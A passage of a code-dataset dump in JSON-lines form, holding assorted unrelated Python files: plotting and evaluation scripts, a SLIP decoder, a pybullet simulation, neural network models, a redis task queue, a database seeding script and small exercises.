[1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0]\n])\n\n## Mesh item will automatically compute face normals.\nm1 = gl.GLMeshItem(vertexes=verts, faces=faces, smooth=False, shader='shaded', glOptions='opaque')\nm1.translate(5, 5, 0)\nm1.setGLOptions('additive')\nw.addItem(m1)\n\n#\n# ## Example 2:\n# ## Array of vertex positions, three per face\n# verts = np.empty((36, 3, 3), dtype=np.float32)\n# theta = np.linspace(0, 2*np.pi, 37)[:-1]\n# verts[:,0] = np.vstack([2*np.cos(theta), 2*np.sin(theta), [0]*36]).T\n# verts[:,1] = np.vstack([4*np.cos(theta+0.2), 4*np.sin(theta+0.2), [-1]*36]).T\n# verts[:,2] = np.vstack([4*np.cos(theta-0.2), 4*np.sin(theta-0.2), [1]*36]).T\n#\n# ## Colors are specified per-vertex\n# colors = np.random.random(size=(verts.shape[0], 3, 4))\n# m2 = gl.GLMeshItem(vertexes=verts, vertexColors=colors, smooth=False, shader='balloon',\n# drawEdges=True, edgeColor=(1, 1, 0, 1))\n# m2.translate(-5, 5, 0)\n# w.addItem(m2)\n\n\n\n\n \n\n\n## Start Qt event loop unless running in interactive 
mode.\nif __name__ == '__main__':\n import sys\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n","sub_path":"three_dim_plotting/example_GLMeshItem_box_w_shading.py","file_name":"example_GLMeshItem_box_w_shading.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"420277044","text":"\"\"\" Evaluate the baselines ont ROUGE/METEOR\"\"\"\n\"\"\" Adapted from https://github.com/ChenRocks/fast_abs_rl \"\"\"\nimport argparse\nimport json\nimport os\nfrom os.path import join, exists\nimport bert_score\nimport re\nimport torch\n\n\ndef _count_data(path):\n \"\"\" count number of data in the given path\"\"\"\n matcher = re.compile(r'[0-9]+\\.ref')\n match = lambda name: bool(matcher.match(name))\n names = os.listdir(path)\n n_data = len(list(filter(match, names)))\n return n_data\n\n\ndef _read_file(filename):\n # print(dec_fname)\n summary_sent_list_lower = []\n with open(filename) as f:\n for _, l in enumerate(f):\n summary_sent_list_lower.append(l.strip().lower())\n summary_str_lower = ' '.join(summary_sent_list_lower)\n return summary_str_lower\n\n\ndef _construct_list(dec_dir, ref_dir):\n print(dec_dir)\n print(ref_dir)\n n_data = _count_data(ref_dir)\n output_summary_str_list = []\n ref_summary_str_list = []\n for i in range(n_data):\n dec_fname = join(dec_dir, '{}.dec'.format(i))\n output_summary_str_lower = _read_file(dec_fname)\n output_summary_str_list.append(output_summary_str_lower)\n ref_fname = join(ref_dir, '{}.ref'.format(i))\n ref_summary_str_lower = _read_file(ref_fname)\n ref_summary_str_list.append(ref_summary_str_lower)\n return output_summary_str_list, ref_summary_str_list\n\n\ndef main():\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n parser = argparse.ArgumentParser('Calculate BERTScore')\n parser.add_argument('--lang', type=str, default=None,\n help='two-letter abbreviation of the language (e.g., en) or \"en-sci\" for scientific text')\n parser.add_argument('-m', '--model', default=None,\n help='BERT model name (default: bert-base-uncased) or path to a pretrain model')\n parser.add_argument('-l', '--num_layers', type=int, default=None, help='use first N layer in BERT (default: 8)')\n parser.add_argument('-b', '--batch_size', type=int, default=64, help='batch size (default: 64)')\n parser.add_argument('--nthreads', type=int, default=4, help='number of cpu workers (default: 4)')\n parser.add_argument('--idf', action='store_true', help='BERT Score with IDF scaling')\n parser.add_argument('--rescale-with-baseline', action='store_true', help='Rescaling the numerical score with precomputed baselines')\n #parser.add_argument('-s', '--seg_level', action='store_true', help='show individual score of each pair')\n parser.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')\n parser.add_argument('--decode_dir', action='store', required=True, help='directory of decoded summaries')\n parser.add_argument('--data', action='store', required=True, help='directory of decoded summaries')\n\n args = parser.parse_args()\n\n dec_dir = join(args.decode_dir, 'output')\n with open(join(args.decode_dir, 'log.json')) as f:\n split = json.loads(f.read())['split']\n ref_dir = join(args.data, 'refs', split)\n print(ref_dir)\n assert exists(ref_dir)\n\n output_summary_str_list, ref_summary_str_list = _construct_list(dec_dir, ref_dir)\n all_preds, hash_code = 
bert_score.score(cands=output_summary_str_list, refs=ref_summary_str_list, model_type=args.model, num_layers=args.num_layers,\n verbose=args.verbose, idf=args.idf, batch_size=args.batch_size,\n lang=args.lang, return_hash=True,\n rescale_with_baseline=args.rescale_with_baseline)\n avg_scores = [s.mean(dim=0) for s in all_preds]\n P = avg_scores[0].cpu().item()\n R = avg_scores[1].cpu().item()\n F1 = avg_scores[2].cpu().item()\n msg = hash_code + \\\n f' R: {R:.6f} P: {P:.6f} F1: {F1:.6f}'\n print(msg)\n \"\"\"\n if args.seg_level:\n ps, rs, fs = all_preds\n for p, r, f in zip(ps, rs, fs):\n print('{:.6f}\\t{:.6f}\\t{:.6f}'.format(p, r, f))\n \"\"\"\n\n f1_all = all_preds[2]\n f1_all_list = f1_all.cpu().tolist()\n with open(join(args.decode_dir, 'bertscore.txt'), 'w') as f:\n for f1 in f1_all_list:\n f.write(\"{:.6f}\\n\".format(f1))\n print(\"Finish!\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"evaluate_bert_score.py","file_name":"evaluate_bert_score.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"132201576","text":"import os\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nexperiment_base_folder = '/itet-stor/baumgach/net_scratch/logs/phiseg/lidc/'\nexperiment_list = ['probunet',\n 'phiseg_7_1',\n 'phiseg_7_5',\n 'probunet_1annot',\n 'phiseg_7_1_1annot',\n 'phiseg_7_5_1annot']\nexperiment_names = ['probunet','phiseg_7_1', 'phiseg_7_5', 'probunet_1annot', 'phiseg_7_1_1annot', 'phiseg_7_5_1annot']\nfile_list = ['ged100_best_ged.npz']*len(experiment_list)\n\n\nged_list = []\n\nfor folder, exp_name, file in zip(experiment_list, experiment_names, file_list):\n\n experiment_path = os.path.join(experiment_base_folder, folder, file)\n\n ged_arr = np.load(experiment_path)['arr_0']\n\n ged_list.append(ged_arr)\n\nged_tot_arr = np.asarray(ged_list).T\n\nprint('significance')\nprint('REMINDER: are you checking the right methods?')\nprint(stats.ttest_rel(ged_list[0], ged_list[1]))\n\nprint('Results summary')\nmeans = ged_tot_arr.mean(axis=0)\nstds= ged_tot_arr.std(axis=0)\n\nfor i in range(means.shape[0]):\n print('Exp. 
name: %s \\t %.4f +- %.4f' % (experiment_names[i], means[i], stds[i]))\n\ndf = pd.DataFrame(ged_tot_arr, columns=experiment_names)\ndf = df.melt(var_name='experiments', value_name='vals')\n\nsns.boxplot(x='experiments', y='vals', data=df)\nplt.show()","sub_path":"eval_ged_plot.py","file_name":"eval_ged_plot.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"228589745","text":"N, X = list(map(int, input().split()))\nA = ['dummy'] + list(map(int, input().split()))\n\n# dp[i][j][k]\n# i: i番目まで見た\n# j: j個選んだ\n# k: jで割ったあまりがk\ndp = [[[0]*N for _ in range(N+1)] for _ in range(N+1)]\nfor i in range(N):\n for j in range(N):\n for k in range(N):\n # i+1番目を選ぶ\n new_val = dp[i][j][k] + A[i+1]\n # print(i+1, j+1, new_val%(j+1), dp[i+1][j+i][new_val%(j+1)])\n dp[i+1][j+1][new_val%(j+1)] = max(new_val, dp[i+1][j+1][new_val%(j+1)])\n # i+1番目を選ばない\n dp[i+1][j][k] = max(dp[i][j][k], dp[i+1][j][k])\n\nprint(*dp, sep='\\n')\nans = N*X\nfor j in range(1, N+1):\n k = X%j\n print(N, j, k)\n if dp[N][j][k] == 0:\n continue\n ans = min((X-dp[N][j][k])//j, ans)\n\nprint(ans)","sub_path":"old/ABC192/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"595541248","text":"#!/usr/bin/env python3\n# coding: utf-8\n\"\"\"\nTwinleaf Generic Device Control\nCopyright 2017 Twinleaf LLC\nLicense: MIT\n\n\"\"\"\nimport binascii\nimport struct\n\nSLIP_END = 0xC0\nSLIP_END_CHAR = b\"\\xC0\"\nSLIP_ESC = 0xDB\nSLIP_ESC_END = 0xDC\nSLIP_ESC_ESC = 0xDD\nSLIP_MAX_LEN = 2048\n\nclass SLIPEncodingError(IOError):\n pass\n\ndef decode(slipbuf):\n if len(slipbuf) < 4:\n raise SLIPEncodingError(\"Packet too short\")\n msg = bytearray()\n rx_esc_next = False\n for byte in slipbuf:\n if rx_esc_next:\n rx_esc_next = False\n if byte == SLIP_ESC_END:\n msg.append(SLIP_END)\n elif byte == SLIP_ESC_ESC:\n msg.append(SLIP_ESC)\n else:\n raise SLIPEncodingError(\"Corrupt SLIP stream: SLIP_ESC not followed by valid escape code\")\n elif byte == SLIP_ESC:\n rx_esc_next = True\n elif byte == SLIP_END:\n # Should have already been framed by SLIP_END\n #raise SLIPEncodingError(\"Corrupt SLIP stream: SLIP_END in packet\")\n pass\n else:\n msg.append(byte)\n msg_checksum = struct.unpack(\"= 27 and vm <= 107:\n\t\tvc = vm - 7\n\telif vm >= 108 and vm <= 121:\n\t\tvc = vm - 8\n\telif vm >= 122 and vm <= 135:\n\t\tvc = vm - 9\n\telif vm >= 136 and vm <= 150:\n\t\tvc = vm - 10\n\telif vm >= 151 and vm <= 161:\n\t\tvc = vm - 11\n\telse:\n\t\tvc = vm\n\n\tvinte = int (vr + ((20*40)/100))\t\n\tcinquenta = vr + ((50*40)/100)\n\n\tif vc >= vr and vc <= vinte:\n\t\tinfracao1 = 1\n\t\tpenalidade = True\n\n\telif vc > vinte and vc <= cinquenta:\n\t\tinfracao1 = 2\n\t\tpenalidade = True\n\n\telif vc > cinquenta:\n\t\tinfracao1 = 3\n\t\tpenalidade = True\n\telse:\n\t\tinfracao = 0\n\t\tpenalidade = 0\t\n\tlista = [vm, vc, infracao1, penalidade,vr]\n\treturn lista\n\n","sub_path":"Testes_Individuais/controle_infracao.py","file_name":"controle_infracao.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"398311018","text":"import pybullet as p\nimport time\nimport pybullet_data\nimport os \n\npath = \"C:/Users/Faga/Desktop/Nathan/ENSTA/Cours/2A/PRe/PRe/burg-toolkit/data/tmp/table.urdf\"\n\n\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical 
version\n\np.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally\np.loadURDF(\"plane.urdf\")\np.setGravity(0,0,-9.81)\n\nstartPosBox = [0,0,2]\nstartOrientationBox = p.getQuaternionFromEuler([0,0,0])\nboxId = p.loadURDF(\"r2d2.urdf\",startPosBox, startOrientationBox)\n\nstartPosTable = [5,0,0]\nstartOrientationTable = p.getQuaternionFromEuler([0,0,0])\nTableId = p.loadURDF(path, startPosTable, startOrientationTable)\n\n#numJoints = p.getNumJoints(boxId)\n#print(numJoints)\n\n#print(p.getJointInfo(boxId, 2))\n#print(p.getJointInfo(boxId, 3))\n#print(p.getJointInfo(boxId, 6))\n#print(p.getJointInfo(boxId, 7))\n\nmaxForce = 500\ntargetVel = -0.01\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 2, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 3, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 6, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n#p.setJointMotorControl2(bodyUniqueId = boxId, jointIndex = 7, controlMode = p.VELOCITY_CONTROL, targetVelocity = targetVel, force = maxForce)\n\n#p.setJointMotorControlArray(bodyIndex = boxId, jointIndices = [2,3,6,7], controlMode = p.VELOCITY_CONTROL, targetVelocities = [targetVel, targetVel, targetVel, targetVel], forces = [maxForce,maxForce,maxForce,maxForce])\n#p.applyExternalForce(objectUniqueId = boxId, linkIndex = -1, forceObj = [-10,0,0], posObj = [1,0,0], flags = p.WORLD_FRAME)\n\n#set the center of mass frame (loadURDF sets base link frame) startPos/Ornp.resetBasePositionAndOrientation(boxId, startPos, startOrientation)\nfor i in range (10000):\n #print(p.getJointState(bodyUniqueId = boxId, jointIndex = 2))\n p.setJointMotorControlArray(bodyIndex = boxId, jointIndices = [2,3,6,7], controlMode = p.VELOCITY_CONTROL, targetVelocities = [i*targetVel, i*targetVel, i*targetVel, i*targetVel], forces = [maxForce,maxForce,maxForce,maxForce])\n p.stepSimulation()\n time.sleep(1./240.)\n\ncubePos, cubeOrn = p.getBasePositionAndOrientation(boxId)\nprint(cubePos,cubeOrn)\n\np.disconnect()\n","sub_path":"burg-toolkit/entrainement.py","file_name":"entrainement.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"552789879","text":"from PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass myConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1):\n super(myConv2d, self).__init__()\n padding = (kernel_size-1)//2\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size=kernel_size, padding=padding)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass dilatedConv(nn.Module):\n ''' stride == 1 '''\n\n def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1):\n super(dilatedConv, self).__init__()\n # f = (kernel_size-1) * d +1\n # new_width = (width - f + 2 * padding)/stride + stride\n padding = (kernel_size-1) * dilation // 2\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, dilation=dilation, padding=padding)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n return self.relu(self.bn(self.conv(x)))\n\n\nclass globalNet(nn.Module):\n def __init__(self, in_channels, out_channels, scale_factor=0.25, kernel_size=3, dilations=None):\n super(globalNet, 
self).__init__()\n self.scale_factor = scale_factor\n if not isinstance(in_channels, list):\n in_channels = [in_channels]\n if not isinstance(out_channels, list):\n out_channels = [out_channels]\n mid_channels = 128\n if dilations is None:\n dilations = [1, 2, 5]\n for i, n_chan in enumerate(in_channels):\n setattr(self, 'in{i}'.format(i=i),\n myConv2d(n_chan, mid_channels//2, 3))\n for i, n_chan in enumerate(out_channels):\n setattr(self, 'in_local{i}'.format(i=i),\n myConv2d(n_chan, (mid_channels+1)//2, 3))\n setattr(self, 'out{i}'.format(i=i),\n myConv2d(mid_channels, n_chan, 1))\n convs = [dilatedConv(mid_channels, mid_channels,\n kernel_size, dilation) for dilation in dilations]\n convs = nn.Sequential(*convs)\n setattr(self, 'convs{}'.format(i), convs)\n\n def forward(self, x, local_feature, task_idx=0):\n size = x.size()[2:]\n sf = self.scale_factor\n x = F.interpolate(x, scale_factor=sf)\n local_feature = F.interpolate(local_feature, scale_factor=sf)\n x = getattr(self, 'in{}'.format(task_idx))(x)\n local_feature = getattr(\n self, 'in_local{}'.format(task_idx))(local_feature)\n fuse = torch.cat((x, local_feature), dim=1)\n x = getattr(self, 'convs{}'.format(task_idx))(fuse)\n x = getattr(self, 'out{}'.format(task_idx))(x)\n x = F.interpolate(x, size=size)\n return torch.sigmoid(x)\n\n\nclass GLN(nn.Module):\n ''' global and local net '''\n\n def __init__(self, localNet, localNet_params, globalNet_params):\n super(GLN, self).__init__()\n self.localNet = localNet(**localNet_params)\n in_channels = localNet_params['in_channels']\n out_channels = localNet_params['out_channels']\n globalNet_params['in_channels'] = in_channels\n globalNet_params['out_channels'] = out_channels\n self.globalNet = globalNet(**globalNet_params)\n\n def forward(self, x, task_idx=0):\n local_feature = self.localNet(x, task_idx)['output']\n global_feature = self.globalNet(x, local_feature, task_idx)\n return {'output': global_feature*local_feature}\n","sub_path":"universal_landmark_detection/model/networks/gln.py","file_name":"gln.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"575892948","text":"import logging\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s [%(levelname)s] ====> %(message)s')\n\"\"\"启动与停止线程\"\"\"\nimport time\nfrom threading import Thread\n\ndef countdown(n):\n while n > 0:\n n -= 1\n time.sleep(5)\n\nif __name__ == '__main__':\n t = Thread(target=countdown, args=(10,))\n t.start() # 启动线程\n if t.is_alive():\n logging.info('Still running')\n else:\n logging.info('Completed')\n\n # 将一个线程加入当前线程,并等待它终止\n t.join()\n # 对于长时间运行的线程或者需要一直运行的后台任务,可以考虑使用后台线程\n # 后台线程无法等待,会在主线程终止时自动销毁\n Thread(target=countdown, args=(10, ), daemon=True)\n","sub_path":"高级特性/chapter12/12_1.py","file_name":"12_1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653442706","text":"from Modules.object import object\nfrom math import sin,cos,radians,degrees\nfrom Modules.collision import rect2rect\nimport pygame\n\nclass portal(object):\n\n def __init__(self,p1,angle):\n self.frames = [pygame.image.load(f'Assets\\\\gravPortal\\\\gravPortal{i+1}.png') for i in range(8)]\n for i,frame in enumerate(self.frames):\n self.frames[i] = pygame.transform.rotate(frame,-angle)\n\n self.index = 0\n self.time = 0\n self.surf = self.frames[0]\n\n self.angle = radians(angle)\n\n self.rect = self.surf.get_rect()\n self.rect.center = 
p1\n\n        self.pts = [(p1[0]-sin(-self.angle+radians(90))*50,p1[1]-cos(-self.angle+radians(90))*50),(p1[0]+sin(-self.angle+radians(90))*50,p1[1]+cos(-self.angle+radians(90))*50)]\n\n    def update(self,dtime,objects):\n\n        for obj in objects:\n            if type(obj).__name__ == 'player':\n                if rect2rect(self.pts+[self.pts[1],self.pts[0]],obj.pts):\n                    obj.angle = self.angle\n\n        self.time += dtime\n        if self.time > 100:\n            self.time -= 100\n            self.index += 1\n            self.index %= len(self.frames)\n\n        self.surf = self.frames[self.index]\n\n    def draw(self,root):\n        root.blit(self.surf,self.rect)\n        #pygame.draw.polygon(root, (0,0,255), self.pts+self.pts,3)\n        #pygame.draw.rect(root,(0,255,0),self.rect,4)\n        #pygame.draw.circle(root,(0,255,0),self.rect.center,10)\n        pass","sub_path":"compilation2/Modules/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"138010573","text":"import warnings\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\nfrom sklearn.preprocessing import StandardScaler\n\nfrom autoscalingsim.scaling.policiesbuilder.metric.forecasting.forecasting_model import ForecastingModel\nfrom autoscalingsim.utils.error_check import ErrorChecker\n\n@ForecastingModel.register('lstm')\nclass LSTM(ForecastingModel):\n\n    \"\"\" Long short-term memory (LSTM) recurrent neural network (RNN) for time series forecasting \"\"\"\n\n    def __init__(self, config : dict):\n\n        super().__init__(config)\n\n        if self._model_fitted is None:\n\n            forecasting_model_params = ErrorChecker.key_check_and_load('config', config)\n            self.lags = ErrorChecker.key_check_and_load('lags', forecasting_model_params, self.__class__.__name__, default = 1)\n            self.n_epochs = ErrorChecker.key_check_and_load('n_epochs', forecasting_model_params, self.__class__.__name__, default = 10)\n            self.d = ErrorChecker.key_check_and_load('differencing_order', forecasting_model_params, self.__class__.__name__, default = 0)\n\n            neurons_count = ErrorChecker.key_check_and_load('neurons_count', forecasting_model_params, self.__class__.__name__)\n            loss_function = ErrorChecker.key_check_and_load('loss_function', forecasting_model_params, self.__class__.__name__, default = 'mean_squared_error')\n            optimizer = ErrorChecker.key_check_and_load('optimizer', forecasting_model_params, self.__class__.__name__, default = 'adam')\n\n            self.scaler = StandardScaler()\n\n            self._model_fitted = tf.keras.models.Sequential([\n                tf.keras.layers.LSTM(neurons_count, batch_input_shape = (1, 1, self.lags), stateful = True),\n                tf.keras.layers.Dense(units = 1)\n            ])\n            self._model_fitted.compile(loss = loss_function, optimizer = optimizer)\n\n    def load_from_location(self, path_to_models_dir : str):\n\n        path_to_model_file = os.path.join(path_to_models_dir, self._construct_model_filepath())\n        if os.path.isfile(path_to_model_file):\n            self._model_fitted = tf.keras.models.load_model( path_to_model_file )\n\n    def save_to_location(self):\n\n        if not self.dir_to_store_models is None:\n            if not os.path.exists(self.dir_to_store_models):\n                os.makedirs(self.dir_to_store_models)\n\n            path_to_model_file = os.path.join(self.dir_to_store_models, self._construct_model_filepath())\n            if not self._model_fitted is None:\n                self._model_fitted.save( path_to_model_file )\n\n    def _internal_fit(self, data : pd.DataFrame):\n\n        with warnings.catch_warnings():\n            warnings.simplefilter('ignore')\n\n            if data.shape[0] > self.lags:\n                lagged_data = self._introduce_explicit_lags(data)\n                
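# Preprocessing pipeline: build lag features first, then difference the\n                # series to remove trend and standardise it before fitting the stateful\n                # LSTM; _internal_predict applies the inverse transforms in reverse order.\n                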
differenced_data = self._difference_timeseries(lagged_data)\n scaled_data = self._scale(differenced_data)\n self._fit_model(scaled_data)\n return True\n\n else:\n return False\n\n def _internal_predict(self, metric_vals : pd.DataFrame, cur_timestamp : pd.Timestamp, future_adjustment_from_others : pd.DataFrame = None):\n\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n forecast_interval = self._construct_future_interval(cur_timestamp)\n forecast = self._forecast(metric_vals, forecast_interval)\n forecast_unscaled = [ self._unscale(fc) for fc in forecast ]\n forecast_restored = self._undifference_timeseries(metric_vals, forecast_unscaled)\n\n return pd.DataFrame({ metric_vals.index.name : forecast_interval, 'value': forecast_restored } ).set_index(metric_vals.index.name)\n\n def _introduce_explicit_lags(self, data : pd.DataFrame):\n\n result = data.copy()\n for lag in range(0, self.lags):\n result[f'value-{lag + 1}'] = result.value.shift(lag + 1)\n\n return result.fillna(0)\n\n def _difference_timeseries(self, data : pd.DataFrame, d : int = 1):\n\n return data.diff().fillna(0)\n\n def _undifference_timeseries(self, historical_data : pd.DataFrame, forecasted_data : list):\n\n return np.cumsum(historical_data.tail(1).value.to_list() + forecasted_data).tolist()[1:]\n\n def _restore_df(self, matrix_of_numbers : np.ndarray, original_df : pd.DataFrame):\n\n data = dict()\n for i in range(matrix_of_numbers.shape[1]):\n data[original_df.columns[i]] = matrix_of_numbers[:,i]\n\n return pd.DataFrame(data, index = original_df.index)\n\n def _scale(self, data : pd.DataFrame):\n\n return self._restore_df(self.scaler.fit_transform(data), data)\n\n def _unscale(self, value : float):\n\n array = np.array([value] + [0] * (len(self.scaler.scale_) - 1))\n array = array.reshape(1, len(array))\n inverted = self.scaler.inverse_transform(array)\n\n return inverted[0, -1]\n\n def _fit_model(self, train : pd.DataFrame):\n\n X, y = train[train.columns[train.columns != 'value']].to_numpy(), train['value'].to_numpy()\n X = X.reshape(X.shape[0], 1, X.shape[1])\n\n for i in range(self.n_epochs):\n self._model_fitted.fit(X, y, epochs = 1, batch_size = 1, verbose=0, shuffle=False)\n self._model_fitted.reset_states()\n\n def _forecast(self, measurements : pd.DataFrame, forecast_interval : pd.Series):\n\n last = measurements[-self.lags:]['value'].to_numpy().flatten().tolist()\n\n predicted = list()\n for i in range(len(forecast_interval)):\n X = np.asarray(last).astype('float32')\n X = X.reshape(1, 1, self.lags)\n yhat = self._model_fitted.predict(X, batch_size = 1).flatten()\n predicted.extend(yhat)\n last = last[1:]\n last.extend(yhat)\n\n return predicted\n","sub_path":"autoscalingsim/scaling/policiesbuilder/metric/forecasting/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553723164","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Software : nothing\n# @File : zaniu_task.py\n# @Author : zaniu (Zzaniu@126.com)\n# @Date : 2019/3/21 11:29 \n# @Description : route 实现了queue 和 timeout, timeout还有点问题,终结进程不能终结进程里面产生的子进程\n# 采用 subprocess.Popen(\"cmd.exe /k taskkill /F /T /PID %i\" % process.pid, shell=True)\n# 的方式结束子进程以及孙子进程会导致后续的任务无法执行\nfrom lib.erweima import make_code\nfrom redis_publish.redis_base import MyRq\n\nzaniu = MyRq()\n\n\n@zaniu.route(queue='LevelLow', timeout=5)\ndef add_1():\n print('沙雕')\n return 2\n\n\n@zaniu.route(queue='LevelLow', timeout=20)\ndef 
get_serialno_spider():\n import os\n os.system(r\"python E:\\HGSpider\\run.py\")\n\n\n@zaniu.route(queue='LevelLow')\ndef generate_code():\n text = '沙雕'\n make_code(text)\n\n\n@zaniu.route(queue='LevelLow', timeout=10)\ndef add_3(x, retry=0):\n print(\"retry = \", retry)\n if x > 3: return\n if retry > 1: raise Exception('沙雕')\n return add_3(x + 1, retry=retry + 1)\n","sub_path":"redis_publish/zaniu_task.py","file_name":"zaniu_task.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"77044185","text":"import os\n\nos.environ['MIGRATION'] = '1'\n\nif not os.getenv('FLASK_ENV') == 'production':\n print(\"Loading environment variables from .env\")\n from dotenv import load_dotenv\n\n load_dotenv()\n\nimport random\nfrom pathlib import Path\nfrom difflib import get_close_matches\nfrom werkzeug.security import generate_password_hash\nfrom werkzeug.utils import secure_filename\nfrom services.database import db\n\nfrom models.model_comment import Comment\nfrom models.model_equipment import Equipment\nfrom models.model_ingredient import Ingredient\nfrom models.model_recipe import Recipe\nfrom models.model_step import Step\nfrom models.model_tag import Tag\nfrom models.model_user import User\nfrom models.relation_like import LikeRelation\nfrom models.relation_recipe_equipment import RecipeEquipmentRelation\nfrom models.relation_recipe_ingredient import RecipeIngredientRelation\nfrom models.relation_recipe_tag import RecipeTagRelation\nfrom models.relation_step_equipment import StepEquipmentRelation\nfrom models.relation_step_ingredient import StepIngredientRelation\nfrom models.relation_subscription import SubscriptionRelation\nimport pandas as pd\n\nall_models = [User, Recipe, Comment, Equipment, Ingredient, Step, Tag,\n LikeRelation, SubscriptionRelation, RecipeEquipmentRelation, RecipeIngredientRelation,\n RecipeTagRelation,\n StepEquipmentRelation, StepIngredientRelation]\n\n# Step 1: Delete all existing data\ndb.drop_tables(all_models)\ndb.create_tables(all_models)\n\n# Step 2: User\npassword = 'Test1234'\nusers_df = pd.read_csv(\"data/users.csv\", sep=';')\nusers = []\nfor user_id, user in users_df.iterrows():\n random.seed(1992 + user_id)\n userId = secure_filename(user['name'].strip()).lower().replace(\"_\", \"\") + (\"%02d\" % random.randint(0, 99))\n users.append(User(userId=userId, name=user['name'].strip(), email=user['email'].strip(),\n pw_hash=generate_password_hash(password), imgName=\"user-%s.png\" % userId\n ))\n\nUser.bulk_create(users)\n\n# Step 3: Tags\ntags_df = pd.read_csv(\"data/tags.csv\", sep=';')\ntags = []\ntag_names = []\nfor tag_id, tag in tags_df.iterrows():\n tags.append(Tag(text=tag['text'].strip()))\n tag_names.append(tag['text'].strip().lower().replace(' ', ''))\nTag.bulk_create(tags)\n\n# Step 4: Ingredients\ningredients_df = pd.read_csv(\"data/ingredients.csv\", sep=';')\ningredients = []\ningredient_names = []\nfor ingredient_id, ingredient in ingredients_df.iterrows():\n ingredients.append(Ingredient(name=ingredient['name'].strip()))\n ingredient_names.append(ingredient['name'].strip().lower().replace(' ', ''))\n\nIngredient.bulk_create(ingredients)\n\n# Step 5: Recipes\nwith Path(\"data/recipes.txt\").open('r') as f:\n lines = f.readlines()\n\nrecipes = []\nrecipe_ingredients = []\nsteps = []\nrecipe_tags = []\nrecipe_id = 0\nstep_no = 1\nfor line in lines[1:]:\n d = line.split('\\t')\n if len(d) <= 1:\n continue\n recipe_name = d[1].strip()\n ingredient_name = 
d[9].strip()\n step = d[12].strip() if len(d) > 12 else ''\n tag_name = d[14].strip() if len(d) > 14 else ''\n\n if recipe_name:\n recipe_serving = int(d[2]) if d[2] else 0\n recipe_prep_time = int(d[3])\n recipe_cook_time = int(d[4])\n recipe_desc = str(d[5]).strip()\n recipes.append(\n Recipe(user=users[0], name=recipe_name, serving=recipe_serving,\n preparation_time=recipe_prep_time, cooking_time=recipe_cook_time, description=recipe_desc,\n imgName=\"recipe-img.png\"))\n step_no = 1\n\n if ingredient_name:\n ingredient_name_parsed = ingredient_name.strip().lower().replace(' ', '')\n ingredient_searchs = get_close_matches(word=ingredient_name_parsed, possibilities=ingredient_names,\n cutoff=0.6)\n assert len(ingredient_searchs) > 0\n\n ingredient = ingredients[ingredient_names.index(ingredient_searchs[0])]\n\n ingredient_qty = d[7]\n ingredient_unit = d[8].strip()\n ingredient_remark = d[10].strip() if len(d) > 10 else ''\n\n recipe_ingredients.append(\n RecipeIngredientRelation(recipe=len(recipes), ingredient=ingredient,\n qty=ingredient_qty, unit=ingredient_unit, remark=ingredient_remark)\n )\n\n if step:\n steps.append(Step(no=step_no, text=step, recipe=len(recipes)))\n step_no += 1\n\n if tag_name:\n tag_name_parsed = tag_name.strip().lower().replace(' ', '')\n tag_searchs = 